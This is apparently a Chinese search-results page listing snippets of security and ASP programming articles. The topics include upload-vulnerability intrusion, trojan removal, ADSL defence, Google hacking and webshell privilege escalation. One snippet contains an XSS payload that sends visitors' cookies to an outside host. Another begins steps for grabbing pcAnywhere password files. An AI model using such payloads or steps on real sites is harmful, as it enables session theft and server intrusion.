搜索列表
-
实例分析ASP上传漏洞入侵实战及扩展
【ASP编程】【上传漏洞欺骗技术】 网络上许多程序都有着上传漏洞,比如任我飞扬整站程序、动感购物商城、秋叶商城、惠信新闻系统等。本文主要讲解上传漏洞的入侵实战以及一些扩展利用。首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般...
实例分析ASP上传漏洞入侵实战及扩展 -
ADSL入侵的防范
【安全相关】 随着各地ADSL网络的蓬勃发展,实现永久连接、随时在线已不再是遥远的梦,但是,我们必须明白,永久连入Internet同样也意味着遭受入侵的可能性大大增加。知己知彼,方能百战不殆,让我们了解一下黑客入侵ADSL用户的方法和防范手段吧。黑客入侵ADSL用户的方法 AD...
|AD|DS|SL|L入|入侵|侵的|的防|防范|范| -
IRC后门病毒及手动清除方法
【安全相关】 2004年年初,IRC后门病毒开始在全球网络大规模出现。一方面有潜在的泄漏本地信息的危险,另一方面病毒出现在局域网中使网络阻塞,影响正常工作,从而造成损失。 同时,由于病毒的源代码是公开的,任何人拿到源码后稍加修改就可编译生成一个全新的病毒,再加上不同的壳,造成IRC后门病毒变种大量...
|IR|RC|C后|后门|门病|病毒|毒及|及手|手动|动清|清除|除方|方法|法| -
自己动手清除电脑中的木马程序
【安全相关】 特洛伊木马是一种基于远程控制的病毒程序,该程序具有很强的隐蔽性和危害性,它可以在你并不知情的的状态下控制你或者监视你的电脑。下面就讲讲木马经常藏身的地方和清除方法。 首先查看自己的电脑中是否有木马 1、集成到程序中 其实木马也是一个服务器-客户端程序,它为...
|自己|己动|动手|手清|清除|除电|电脑|脑中|中的|的木|木马|马程|程序|序| -
黑客秘籍:Windows下权限设置
【安全相关】 随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对cra...
|黑客|客秘|秘籍|籍W|Wi|in|nd|do|ow|ws|s下|下权|权限|限设|设置|置| -
查找与清除线程插入式木马
【安全相关】 目前网络上最猖獗的病毒估计非木马程序莫数了,特别是在过去的2004年木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木...
|查找|找与|与清|清除|除线|线程|程插|插入|入式|式木|木马|马| -
ADSL防御黑客攻击的十大方法
【安全相关】 目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。 一、取消文件夹隐藏共享 如果你使用了...
|AD|DS|SL|L防|防御|御黑|黑客|客攻|攻击|击的|的十|十大|大方|方法|法| -
关于动网的cookie泻露站点绝路径的问题
【安全相关】一、跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565...
关于动网的cookie泻露站点绝路径的问题 -
利用Google作黑客攻击的原理
【安全相关】 技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。为了引起大家对GoogleHacking的关注与重视,我们编发了这篇文章希望大家通过对Hack的攻击手段的了解,更好的保护自己...
|利用|用G|Go|oo|og|gl|le|e作|作黑|黑客|客攻|攻击|击的|的原|原理|理| -
提升(web)权限终极9技巧
【安全相关】当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2....
提升(web)权限终极9技巧 -
网站生成静态页面,及网站数据采集的攻、防原理和策略
【ASP编程】发布时间:2005年11月27日 晚 文章作者:翟振凯 (小琦) 交流方式: 个人站:http://www.xiaoqi.net 技术站:http://www.iisvs.net 商业站:http://www.iisvs.com QQ:53353866 22336848 关于本文: 本着互...
网站生成静态页面,及网站数据采集的攻、防原理和策略 -
自动采集程序
【ASP编程】最近在做一个音乐站,音乐文件嘛。。。一般是从网上收集。。so。。写了一段采集程序。 复制代码 代码如下:<% On Error Resume Next Const uploadPath = "/uploads/" '文件存放路径 Const allowFileExt&nbs...
自动采集程序